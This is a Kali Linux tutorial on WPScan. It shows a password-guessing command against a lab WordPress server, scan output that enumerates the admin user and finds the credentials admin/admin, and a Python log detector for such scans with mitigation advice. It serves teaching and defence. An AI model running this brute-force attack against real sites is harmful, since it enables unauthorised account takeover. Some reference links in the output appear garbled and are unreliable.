WPScan

WPScan is a WordPress vulnerability scanner. In Kali, it is found in the desktop menu under 03:Web Application Analysis > Web Vulnerability Scanners.

The following command runs a password attack against a WordPress server (192.168.0.3/wordpress). The --passwords option requires a password file containing the list of passwords to use during the attack.

One of the easiest ways to prepare the password file is to use the Openwall wordlists collection (https://download.openwall.net/). The following command uses a file named “password”, downloaded from the /pub/wordlists/passwords directory, as its list of passwords.

kali@kali:~$ wpscan --url 192.168.0.3/wordpress --passwords ./password
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.6
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

 [+] URL: http://192.168.0.3/wordpress/
 [+] Started: Mon Apr 25 00:00:00 20xx

Interesting Finding(s):

 [+] http://192.168.0.3/wordpress/
 | Interesting Entry: Server: Apache/2.4.38 (Raspbian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

 [+] http://192.168.0.3/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://wordpress_ghost_scanner
 |  - https://wordpress_xmlrpc_dos
 |  - https://wordpress_xmlrpc_login
 |  - https://wordpress_pingback_access

 [+] http://192.168.0.3/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.0.3/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://192.168.0.3/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4 identified (Latest, released on 2020-03-31).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.0.3/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.4'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.0.3/wordpress/, Match: 'WordPress 5.4'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)

 Checking Config Backups -: |=============================================|

[i] No Config Backups Found.

[+] Enumerating Users (via Passive and Aggressive Methods)

 Brute Forcing Author IDs -: |============================================|

[i] User(s) Identified:

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Performing password attack on Wp Login against 1 user/s

Progress: |=================================================
[SUCCESS] - admin / admin
Progress: |===============================================================|

[i] Valid Combinations Found:
 | Username: admin, Password: admin

[+] Finished: Mon Apr 25 00:00:00 20xx
[+] Requests Done: 2895
[+] Cached Requests: 5
[+] Data Sent: 1.42 MB
[+] Data Received: 16.047 MB
[+] Memory used: 132.027 MB
[+] Elapsed time: 00:02:43

The log shows that wpscan found the admin/admin username/password pair in 3 minutes.
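On the server side, the two aggressive steps in this log (author ID brute forcing, then the password attack on wp-login) stand out in the web server's access log. The following is an added example, not part of the original post or of WPScan: a small detector over Apache combined-format log lines. The sample lines, client addresses, thresholds and the assumption that author probing appears as ?author=N requests are all constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" log format: client, timestamp, request line, status.
LINE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
LOGIN = re.compile(r'/(wp-login\.php|xmlrpc\.php)(\?|$)')
AUTHOR = re.compile(r'[?&]author=\d+')

def detect(lines, window=timedelta(seconds=60), login_limit=10, author_limit=5):
    """Return {client_ip: set of findings} for sources exceeding either limit."""
    logins = defaultdict(list)   # client -> timestamps of login POSTs
    authors = defaultdict(set)   # client -> distinct ?author=N values requested
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, ts, method, path, _status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        if method == "POST" and LOGIN.search(path):
            logins[ip].append(when)
        if (hit := AUTHOR.search(path)):
            authors[ip].add(hit.group(0))
    findings = defaultdict(set)
    for ip, stamps in logins.items():
        stamps.sort()
        start = 0
        for end, t in enumerate(stamps):   # sliding window over login POSTs
            while t - stamps[start] > window:
                start += 1
            if end - start + 1 >= login_limit:
                findings[ip].add("login-burst")
                break
    for ip, ids in authors.items():
        if len(ids) >= author_limit:
            findings[ip].add("author-enumeration")
    return dict(findings)

def sample_log():
    """Constructed log lines: one scanning client and one ordinary visitor."""
    fmt = '{ip} - - [25/Apr/2020:10:00:{s:02d} +0000] "{m} {p} HTTP/1.1" {c} 512'
    out = [fmt.format(ip="192.168.0.9", s=i, m="GET", p=f"/wordpress/?author={i}", c=301)
           for i in range(1, 8)]
    out += [fmt.format(ip="192.168.0.9", s=10 + i, m="POST", p="/wordpress/wp-login.php", c=200)
            for i in range(20)]
    return out + [
        fmt.format(ip="192.168.0.7", s=5, m="POST", p="/wordpress/wp-login.php", c=302),
        fmt.format(ip="192.168.0.7", s=6, m="GET", p="/wordpress/?author=1", c=301)]

if __name__ == "__main__": print(detect(sample_log()))
```

A source flagged for both findings matches the sequence in the scan log above; rate limiting or lockout on wp-login.php and xmlrpc.php, plus a non-default admin password, closes the gap the scan exposed.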

Note: wpscan requires internet access to update its database. If the database server is unreachable, wpscan aborts the scan:

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.6
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

 [i] Updating the Database ...

Scan Aborted: Unable to get https://data.wpscan.org/metadata.json.sha512 (Couldn't connect to server)